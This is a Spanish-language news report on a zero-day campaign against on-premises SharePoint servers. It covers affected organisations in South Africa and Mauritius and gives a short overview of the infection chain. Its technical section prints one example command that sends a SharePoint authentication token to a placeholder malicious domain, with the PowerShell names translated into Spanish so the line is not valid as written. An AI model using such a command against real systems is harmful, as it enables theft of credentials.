Un reciente y sofisticado ciberataque ha logrado comprometer a más de 400 entidades a nivel mundial al explotar una vulnerabilidad de día cero en los servidores de Microsoft SharePoint. Este incidente ha tenido un impacto particularmente significativo en varias naciones africanas, incluyendo Sudáfrica y Mauricio.
El ataque se enfoca específicamente en instalaciones locales de SharePoint, aprovechando fallas de seguridad previamente desconocidas para infiltrar sistemas de infraestructura crítica. Entre las organizaciones afectadas se encuentran agencias gubernamentales, instituciones educativas y corporaciones privadas. La campaña de malware fue detectada la semana pasada por la firma holandesa de ciberseguridad Eye Security, que identificó la ola inicial de infracciones.
A diferencia de las vulnerabilidades comunes de SharePoint que afectan a las instancias alojadas en la nube, este día cero se dirige específicamente a organizaciones que operan servidores de SharePoint en su propia infraestructura. Esta configuración es frecuentemente preferida por muchas instituciones debido al mayor control y la percepción de seguridad que ofrece. El vector de ataque aprovecha capacidades de ejecución de código no autorizado dentro del marco de colaboración de documentos de SharePoint, lo que permite a los atacantes establecer acceso persistente a las redes objetivo.
Analistas de Business Insider Africa han identificado patrones de comportamiento avanzados en el malware, destacando su capacidad para permanecer indetectable mientras extrae datos sensibles de los sistemas comprometidos. Solamente en Sudáfrica, las víctimas incluyen un importante fabricante de automóviles, varias universidades, entidades gubernamentales locales y el Tesoro Nacional, donde se descubrió malware en el sitio web del Modelo de Informes de Infraestructura.
Mecanismo de Infección y Análisis Técnico
La vulnerabilidad de día cero en SharePoint explota una falla de ejecución remota de código en el mecanismo de autenticación del servidor, permitiendo a los atacantes eludir los controles de seguridad estándar. El análisis técnico revela que el malware emplea un sistema de entrega de carga útil de varias etapas.
Ejemplo de Vector de Explotación Potencial:
Invocar-WebRequest -Uri "http://dominio-malicioso/payload.aspx" -Método POST -Cuerpo $sharepoint_auth_token
El ataque se inicia con análisis de reconocimiento dirigidos a granjas de SharePoint que ejecutan versiones vulnerables. Esto es seguido por la explotación de la omisión de autenticación para inyectar web shells maliciosos.
Microsoft ha confirmado que esta vulnerabilidad afecta exclusivamente a las instalaciones locales de SharePoint, mientras que los servicios de SharePoint Online, alojados en la nube, permanecen seguros gracias a la infraestructura de seguridad gestionada por Microsoft.
